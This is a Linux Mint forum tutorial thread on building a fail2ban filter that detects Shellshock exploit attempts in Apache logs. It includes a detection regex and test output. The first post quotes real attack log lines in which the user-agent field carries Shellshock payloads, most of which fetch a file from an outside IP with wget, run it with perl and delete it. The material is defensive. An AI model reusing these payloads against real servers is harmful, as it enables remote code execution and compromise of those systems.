HowTo: Shellschock fail2ban filter

Write tutorials for Linux Mint here
More tutorials on https://github.com/orgs/linuxmint/discu ... /tutorials and (archive) on https://community.linuxmint.com/tutorial
Forum rules
Don't add support questions to tutorials; start your own topic in the appropriate sub-forum instead. Before you post read forum rules
Post Reply
Habitual

HowTo: Shellschock fail2ban filter

Post by Habitual »

I wrote this today, using fail2ban 0.8.10, so YMWV:
9 samples in /var/log/test.log

Code: Select all

89.207.135.125 - - [25/Sep/2014:04:14:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 401 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/info.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 400 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /test HTTP/1.0" 404 389 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
74.201.85.66 - - [25/Sep/2014:23:43:24 -0400] "GET /cgi-bin/php5 HTTP/1.0" 500 738 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
and the filter in /etc/fail2ban/filter.d/shellshock.conf

Code: Select all

[Definition]

docroot = /var/www/html
failregex = failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

ignoreregex =
Props to IBBoard

Testing:

Code: Select all

fail2ban-regex /var/log/test.log  /etc/fail2ban/filter.d/shellshock.conf
Results:

Code: Select all

Summary
=======

Addresses found:
[1]
    89.207.135.125 (Thu Sep 25 04:14:19 2014)
    198.20.69.74 (Thu Sep 25 17:42:32 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)
    74.201.85.66 (Thu Sep 25 23:43:24 2014)

Date template hits:
18 hit(s): Day/MONTH/Year:Hour:Minute:Second

Success, the total number of match is 9
On Fail2Ban v0.8.10

Enjoy the Goodness!
Last edited by Habitual on Sat Sep 27, 2014 1:53 pm, edited 2 times in total.
Top
IBBoard

Re: HowTo: Shellschock fail2ban filter

Post by IBBoard »

I was looking for Fail2ban Shellshock regexes, and this post ranks quite highly on Google at the moment. While it will work, I think you've cast your RegEx net FAR too wide and you're going to cripple some people's websites.

Actually use cgi-bin (e.g. for AWStats)? You'll get banned. Post an article with "ping", "bash" or "wget" anywhere in the URL (including in the middle of phrases like "shopping")? You're going to get people banned. Got a referal from some other site that is out of your control that has those words anywhere in the URL? You're going to get people banned. Got a bot that visits that legitimately uses any of those words in its user agent (such as a link to a "scraping policy")? They'll get banned.

I've just tested this one on my logs and I think it is a bit safer and slightly more proof against variants:

Code: Select all

<HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+
Basically, it looks for the function creating that is the actual Shellshock vulnerability, rather than what they're trying to do with it. It allows variable amounts of white space (because if I was exploiting this then that'd be my obvious first attempt to bypass filters) and it makes sure that it all occurs inside a single field in the Apache log (by doing "zero/one or more characters that aren't a quote").

If anyone has any suggestions for improving this, or can spot any issues or anything it misses, feel free to give me a shout and/or improve it.
Top
Habitual

Re: HowTo: Shellschock fail2ban filter

Post by Habitual »

Yeah, I suck at RegEx

I tested your new failregex using

Code: Select all

198.20.69.74 - - [25/Sep/2014:17:42:32 -0400] "GET / HTTP/1.1" 200 288 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
198.20.69.75 - - [25/Sep/2014:17:42:32 -0400] "POST / HTTP/1.1" 200 288 "() { :; }; anything here
and it found it. Great Tip, thanks!

Original post updated with credit.
Top
Post Reply

Return to “Tutorials”